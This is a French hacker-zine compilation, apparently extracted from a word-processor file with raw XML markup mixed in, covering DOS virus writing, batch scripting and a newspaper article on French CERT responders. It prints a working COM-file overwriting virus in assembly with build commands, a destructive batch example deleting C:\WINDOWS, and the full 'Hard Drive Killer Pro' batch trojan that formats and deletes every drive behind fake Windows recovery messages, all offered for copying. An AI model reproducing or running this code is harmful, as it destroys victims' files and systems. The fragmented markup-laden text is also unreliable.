peuve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Programmation de virus (par Syphillis [Beef13]):</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 programme est tout simple : Il cherche les fichiers COM dans le rep coura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 les infecte en se copiant au tout debut du fichi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ais comment chercher des fichier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n utilisant la fonction de l'API DOS appropriée. Comment la connaitre ? E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isant le truc sur les interrupt de DEF ou HELPPC ou la Bible P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on dans notre cas, il s'agit des fonctions 4Eh et 4Fh. Ces fonction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orrespondent aux fonctions C findfirst() et findnext() mais ici on n'a pa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e ffblk.</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l faut d'abord appeler la fonction 4Eh ( findfirst ) avec comme paramètr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n AH le numéro de la fonc et en dx l'OFFSET sur une chaine ASCIIZ (qui fini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ar un zero si t es trop con pour savoir ce que c'est ) avec le nom du fichi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à rechercher ( les caractères jokers sont accepté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n retour le CARRY FLAG est arm‚ si y a pas de fichier. Si un fichier es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trouvé plein de trucs sont mis dansl la DTA qui est toujours située à parti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e l'OFFSET 80h du PSP. Le nom du fichier se trouve à L OFFSET 9Eh. Po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rechercher un autre fichier, il suffit d'appeler la fonction 4Fh ( mov ah,4F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uis int 21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Bon maintenant on sait chercher des fichiers. Mais comment s'en servi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ouviens toi qu'on a le nom du fichier qu'on vient de trouver à l offset 9E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 debut du segment dans le PSP ( Prefix Segment Program ou l inverse sai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l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l va encore falloir se servir des fonctions de l'API DOS. Les utiles ici</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ont au nombre de troi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a 3Dh  : ouvrir un fichier  (Handl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a 3Eh  : fermer un fichier  (Handl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a 40h  : écrire dans un fichier (Handl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ans le monde de DOS il existe 2 moyens de se servir des fichiers : le FCB</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 les Handles. Nous utiliserons les Handle qui sont beaucoup plus pratiqu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ans cette situat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ouvrir un fichier, il suffit de foutre en AH le numéro de la font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3Dh) en AL les attributs et en dx l'offset sur la chaine ASCIIZ du nom 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ichier puis un petit int 21h et le tour est joué. Cette fonction renvoi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Handle du fichier en AX. Mais comme toutes les autres fonctions le veule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n BX ou le foutra en BX toute suite grâce à un xchg ax,b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uis on écrit dedans le virus au tout début du fichier. Etant donné qu'i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iens d'être ouvert, il est au tout début et pas de soucis à avoir de ce côté‚</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à. Pour ecrire fous en AH 40h, en Bx le Handle, en CX la taille et en D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offset du buffer à écrire. Dans notre cas l'offset est égal à 100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fin du PSP et début du prog). La taille a été codée directement mai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on aurait pu mettre un OFFSET machin avec un machin: à la fin du fil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ke tout soit OK.</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Reste à fermer le fichier avec la fonction 3Eh qui attends le handle en B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 le tour et joué.</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oici maintenant le fichier. Grâce … queqlques astuces dans son organisat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j ai pu réduire sa taille au ma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Fichier IGA1.ASM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Ce virus est un virus débil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odel small                        ;modele de mémoir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ode                              ;segment de co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ORG     100h               ;un COM commence … l adresse mémoire 100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ON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mov     ah,4Eh             ; Rechercher le premier COM du répertoir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mov     dx,OFFSET FILESPE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int     21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NFEC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jc      FIN                ; si aucun -&gt; FI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mov     ax,3D01h           ; un fichier a été trouvé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mov     dx,9Eh             ; l'ouvri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int     21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xchg    ax,bx              ;Handle en B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mov     ah,40h             ;Ecrire le virus au début du fichie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mov     cx,2Dh              ;Taille du vir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mov     dx,100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int     21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mov     ah,3Eh             ;fermer le fichie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int     21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mov     ah,4Fh             ;chercher fichier suivan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int     21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jmp     INFEC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I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re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FILESPEC DB '*.COM',0 ; Doit finir par un zéro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END IGA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Fin du Fichie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oilà c'est tou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le compiler : tasm iga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tlink /t iga1</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 on a le fichier iga1.co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i tu ne comprends pas ce code, passe ton chemin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i toi tester ce virus, il detruira tous les fichiers COM du répertoir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st un peu ennuyeux si on veux rester discre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Un autre truc. Il ne marche pas avec les fichiers EXE. C normal, ceux ci</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yant un en-tête precis et pouvant faire plusieurs segment, ils sont pl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ompliqués à infect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Remarque:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> je n'ai pas vérifié la véracité de ces faits, de plus au niveau de la compilation du programme je pense qu'il vaut mieux rajouter ces quelques lignes (Note de Clad Strife):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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Le programme doit être saisi dans un fichier texte non formatté (c'est-à-dire sans caractères en gras, souligné, avec des polices de caractères de différentes tailles, ...) appelé fichier source. En effet, l'assembleur (le programme permettant de faire la traduction du langage assembleur en langage machine) permet uniquement de créer un fichier assemblé à partir du fichier source (il devra comporter l'extension .ASM, en s'appelant par exemple </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>source.asm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou n'importe quel autre nom suivi de l'extension .asm). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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L'assembleur va fournir un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>fichier objet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (dont l'extension est .obj) qui va contenir l'ensemble des instructions traduites en instructions machines. Ce fichier .OBJ ne pourra toutefois pas s'exécuter directement car il faut encore lier les différents fichiers. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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Comment ça les différents fichier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0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">En effet il est possible de construire un exécutable à partir de plusieurs fichiers sources (à partir d'un certain niveau de programmation il devient intéressant de créer des fichiers contenant des fonctions...). Ainsi, même si vous avez un seul fichier objet il vous faudra utiliser un programme (appelé </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>éditeur de liens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">) qui va vous permettre de créer un fichier exécutable (dont l'extension sera .ex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0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>A quoi ressemble un fichier en assembleur:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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Comme dans tout programme le fichier source doit être saisi de manière rigoureuse. Chaque définition et chaque instruction doivent ainsi s'écrire sur une nouvelle ligne (pour que l'assembleur puisse les différencier) Le fichier source contient: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Des définitions de données déclarées par des directives (mots spéciaux interprétés par l'assembleur, nous les étudierons plus tard, le but est ici de donner une idée de ce à quoi ressemble un fichier source) Celles-ci sont regroupées dans le segment de données délimité par les directives SEGMENT et ENDS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Puis sont placées les instructions (qui sont en quelques sorte le coeur du programme), la première devant être précédée d'une étiquette, c'est-à-dire un nom qu'on lui donne. Celles-ci sont regroupées dans le segment d'instructions délimité par les directives SEGMENT et ENDS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Enfin le fichier doit être terminé par la directive END suivi du nom de l'étiquette de la première instruction (pour permettre au compilateur de connaître la première instruction à exécuter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Les points-virgules marquent le début des commentaires, c'est-à-dire que tous les caractères situés à droite d'un point virgule seront ignorés) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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Voici à quoi ressemble un fichier source (fichier .AS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0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000FF"/>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t xml:space="preserve">donnees   </w:t>
        <w:tab/>
        <w:t>SEGMENT; voici le segment de données dont l'étiquette est donne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tab/>
        <w:t>;Placez ici les déclarations de donné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t xml:space="preserve">donnees </w:t>
        <w:tab/>
        <w:t>ENDS; ici se termine le segment de donne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t>ASSUME DS:data, CS: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t>instr</w:t>
        <w:tab/>
        <w:t>SEGMENT; voici le segment d'instructions dont l'etiquette est inst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tab/>
        <w:t>debut:</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>;placez ici votre premiere instruction (son etiquette est nommée deb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tab/>
        <w:tab/>
        <w:tab/>
        <w:t>;Placez ici vos instructio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t>instr</w:t>
        <w:tab/>
        <w:t>ENDS; fin du segment d'instructio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FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>END debut; fin du programme suivie de l'etiquette de la premiere instruc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0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000FF"/>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0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="fr-F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0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>la déclaration d'un segment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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Comme nous le verrons plus loin &lt;segmentation.htm&gt;, les données sont regroupées dans une zone de la mémoire appelé segment de données, tandis que les instructions se situent dans un segment d'instructions. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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Le registre DS (Data Segment) contient le segment de données, tandis que le registre CS (Code Segment) contient le segment d'instructions. C'est la directive ASSUME qui permet d'indiquer à l'assembleur où se situe le segment de données et le segment de code. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">Puis il s'agit d'initialiser le segment de donné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0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>MOV AX, nom_du_segment_de_donne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color w:val="0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>MOV DS, AX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>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On va s'en arrêter là pour la programmation en assembl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Bases de la programmation de .bat:</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a création de fichiers .bat est simple: il suffit de s'y connaitre un peu en MS-DOS, et savoir taper sur son clavier. D'abord quelqes commandes de bas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off : désactive l'affichage de ce qui se pass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ir C:\WINDOWS : affiche le contenu de C:\WINDOW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el C:\WINDOWS\*.exe : efface tous les fichiers .exe du C:\WINDOW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 saute une lign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cho J'écris bien hein? : affiche ce qui est écrit après [echo]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ls : efface l'écran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pause : demande d'appuyez sur une touche pour continue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WINDOWS\telnet.exe : éxécute telne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Donc voici le genre de fichiers .bat extrèmement dangereux que vous pouvez fair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off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this programm is created by XXX all rights reserved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paus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del C:\WINDOW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dir C:\WINDOW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t'es mor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xml:space="preserve">cl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On peut aussi créer des menus d'option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off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menu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cl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Menu d'options :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1. Editer autoexec.ba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2. Editer config.sy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Q. Quitter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choice /c:12Q /t:Q,60 /n Votre choix ?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if errorlevel 255 goto erreur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if errorlevel 3 goto Quitter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if errorlevel 2 goto EditConf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if errorlevel 1 goto EditAuto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if errorlevel 0 goto erreur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goto fin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rreur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Il y a eu une erreur.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goto fin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Quitter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goto fin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ditConf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dit c:\config.sy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goto menu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ditAuto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dit c:\autoexec.bat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goto menu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xml:space="preserve">:fin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Si vous n'avez pas compris le passage sur la commande choice et errorlevel, voilà de quoi vous aide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Aide sur CHOICE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hoice [/c:ON] [/t:X,nn] [/n] [Invit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ON Choix de lettres utilisables (ici O et N) (ON par défau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t:X,nn Choisira automatiquement option X après nn secondes. X doit faire parti de la liste /c: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n Interdit le respect de la cass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Invite Texte d'invite qui apparaî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rrorlevel correspond au choix de l'utilisateur. c'est comme la variable de réponse en Q-Basic.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Paramètre de la ligne de commande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off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cls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Le prog est %0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Bonjour %1, </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echo.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FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">echo A plus, %2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Enregistrer sous "c:\test.bat" et taper sous dos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test.bat "votrenom" "unAutrenom"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X correspond au Xième groupe de caractères sur la ligne de commande pour X={0;9}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Très pratique pour faire un prog d'installation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xcopy a:\*.* %1:\%2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Ici, %1 est la lettre de lecteur et %2 le dossier. </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Virus en .b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rticle qui va suivre va faire une brève description d'un virus en .bat qui est malheureusement détecté par AVP et Norton (synonyme de qualité donc), comme trojan. Au sens littéral du terme un trojan et un virus se différencie par très peu de choses: un virus s'inscrit partout sur un HD, un trojan non. Il existe 2 sortes de troja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les trojans usuels (que vous connaissez et qui se foutent comme serveur sur votre béc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les trojans destructeurs (celui qui va suiv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ci le code source à copier dans un .txt et à renommer en .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off</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This program is dedecated to a very special person that does not want to be named.</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star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l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PLEASE WAIT WHILE PROGRAM LOADS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all attrib -r -h c:\autoexec.bat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off &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call format c: /q /u /autotest &gt;nul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all attrib +r +h c:\autoexec.bat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Drive checking and assigning the valid drives to the drive variable.</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set drive=</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set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z</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code insertion for Drive Checking takes place here.</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drivechk.bat is the file name under the root directory.</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 xml:space="preserve">rem As far as the drive detection and drive variable settings, don't worry about how it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works, it's damn to complicated for the average or even the expert batch programmer.</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Except for Tom Laveda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off &gt;drivechk.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prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" &gt; nul &gt;{t}.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omspec% /e:2048 /c {t}.bat &gt;&gt;drivechk.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del {t}.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f errorlevel 1 goto enddc &gt;&gt;drivechk.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l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PLEASE WAIT WHILE PROGRAM LOADS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When errorlevel is 1, then the above is not true, if 0, then it's true.</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Opposite of binary rules. If 0, it will elaps to the next command.</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prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" &gt; nul &gt;{t}.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omspec% /e:2048 /c {t}.bat &gt;&gt;drivechk.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del {t}.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f errorlevel 1 goto enddc &gt;&gt;drivechk.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l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PLEASE WAIT WHILE PROGRAM LOADS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if errorlevel is 1, then the drive specified is a removable media drive - not ready.</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if errorlevel is 0, then it will elaps to the next command.</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prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" &gt; nul &gt;{t}.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omspec% /e:2048 /c {t}.bat &gt;&gt;drivechk.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del {t}.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f errorlevel 1 set drive=%%drive%% %%1 &gt;&gt;drivechk.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l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PLEASE WAIT WHILE PROGRAM LOADS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if it's errorlevel 1, then the specified drive is a hard or floppy drive.</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if it's not errorlevel 1, then the specified drive is a CD-ROM drive.</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nddc &gt;&gt;drivechk.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 xml:space="preserve">rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".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Now we will use the program drivechk.bat to attain valid drive information.</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testdrv</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for %%a in (%alldrive%) do call drivechk.bat %%a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del drivechk.bat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form_de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all attrib -r -h c:\autoexec.bat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off &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Loading Windows, please wait while Microsoft Windows recovers your system . . .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for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest &gt;nul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cls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Loading Windows, please wait while Microsoft Windows recovers your system . . .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for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga &gt;nul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cls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Loading Windows, please wait while Microsoft Windows recovers your system . . .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for %%%%a in (%drive%) call deltree /y %%%%a:\ &gt;nul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cls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Loading Windows, please wait while Microsoft Windows recovers your system . . .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for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest &gt;nul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cls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Loading Windows, please wait while Microsoft Windows recovers your system . . .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for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga &gt;nul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cls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Loading Windows, please wait while Microsoft Windows recovers your system . . .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for %%%%a in (%drive%) call deltree /y %%%%a:\ &gt;nul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cd\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cls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Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0.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If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . .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1. To make people aware that security should not be taken for granted.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2. Love is important, if you have it, truly, don't let go of it like I did!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3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead.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4. If you are Australian, I feel sorry for you, accept my sympathy, you retard.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5. Don't support the following: War, Racism, Drugs and the Liberal Party.&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Regards,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Munga Bunga &gt;&gt;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all attrib +r +h c:\autoexec.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makedir</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if exist c:\temp.bat attrib -r -h c:\temp.bat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echo off &gt;c:\temp.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1:\ &gt;&gt;c:\temp.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cd\ &gt;&gt;c:\temp.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startmd &gt;&gt;c:\temp.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for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a &gt;&gt;c:\temp.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for %%%%a in ("&gt;ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! &gt;&gt;c:\temp.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f not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd &gt;&gt;c:\temp.ba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all attrib +r +h c:\temp.bat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l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nitializing Variables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 deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.</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for %%a in (%drive%) do call format %%a: /q /u /autotest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l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nitializing Variables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Validating Data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for %%a in (%drive%) do call c:\temp.bat %%a Munga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l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nitializing Variables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Validating Data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Analyzing System Structure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for %%a in (%drive%) call attrib -r -h %%a:\ /S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all attrib +r +h c:\temp.bat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all attrib +r +h c:\autoexec.bat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l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nitializing Variables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Validating Data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Analyzing System Structure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nitializing Application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for %%a in (%drive%) call deltree /y %%a:\*.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l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nitializing Variables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Validating Data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Analyzing System Structure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Initializing Application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Starting Application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for %%a in (%drive%) do call c:\temp.bat %%a Munga &gt;nul</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cl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Thank you for using a Munga Bunga produc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Oh and, Bill Gates rules, and he is not a geek, he is a good looking geniu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Here is a joke for you .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Q). What's the worst thing about being an egg?</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w:t>
        <w:tab/>
        <w:t xml:space="preserve"> A). You only get laid once.</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HAHAHAHA, get it? Don't you just love that one?</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Regard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echo Munga Bunga</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FF0000"/>
        </w:rPr>
        <w:t>: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FF0000"/>
        </w:rPr>
        <w:t>rem Hard Drive Killer Pro Version 4.0, enjo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FF0000"/>
        </w:rPr>
        <w:t>rem Author: Munga Bunga - from Australia, the land full of retarded Australian's (help me get out of here).</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u w:val="single"/>
        </w:rPr>
        <w:t>Article de Libération sur les "pompiers du net":</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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Quand le câble qui achemine les données de l'Internet vers l'Angleterre a viré au rouge sur l'écran de contrôle, il a fallu réagir très vite. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>«Au début, on ne savait pas ce qui se passait»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>, raconte David Crochemore. Sous ses yeux, il avait la cartographie des tuyaux qui composent Renater, le réseau informatique français de l'enseignement et de la recherche. Quand un des liens passe au orange ou au rouge, c'est l'alerte. Simple souci technique ou attaque de pirate informatiqu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 xml:space="preserve">Riposte. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Ce jour d'octobre, un hacker était passé par là: le câble qui relie Renater à l'Angleterre était presque saturé, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>«très encombré»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> par des données envoyées en masse par le pirate malveillant. Coups de téléphone aux techniciens présents aux endroits stratégiques, interventions sur les ordinateurs. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>«En quelques heures, on a réglé le problèm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avid Crochemore, avec sa moustache en guidon de vélo, est un pompier. Un soldat du feu high-tech, responsable pour Renater du Cert (Computer Emergency Response Team), le nom générique donné aux «équipes de riposte en cas d'urgence informatique». Partout dans le monde, des structures de ce type ont pour mission de réagir aux attaques de pirates, aux virus et à tous les hoquets de sécurité de l'Interne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Notre rôle n'est pas de déposer plainte ou de donner la chasse aux pirates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, explique David Crochemore, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mais d'assister les utilisateurs victimes d'une attaque.»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le Cert, qu'il dirige coordonne les efforts des spécialistes de la sécurité présents notamment au CEA (Commissariat à l'énergie atomique), au Cnes (Centre national d'études spatiales) et dans les universités. Il diffuse des alertes, avertit de l'existence de nouveaux virus, fournit des documents sur les failles de sécurité des logiciels. Et, dans l'autre sens, centralise les informations envoyées par ses correspondants. Un bon moyen pour repérer les attaques à la mode. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>«Quand un nouvel outil de piratage apparaît, tous les hackers de bas étage se ruent dessus»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>, sourit Crochemor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e boulot ne manque pas. Par jeu ou par malveillance, les pirates ne cessent de prendre d'assaut les machines. Du côté de Renater, David Crochemore avoue cinq ou six problèmes graves (prise de contrôle d'un ordinateur) et cinquante à soixante-dix incidents plus bénins par mois. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>«C'est près de cinq fois plus qu'il y a deux ans</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, dit-il. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Mais on ne nous signale pas tout.»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> A Bordeaux, le responsable de la sécurité des universités concède qu'il est victime de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>«deux à trois tentatives de piratage quotidiennes»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Et précise que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>«ceux qui disent qu'ils ne sont pas attaqués sont des menteurs»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</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b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Urgence. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
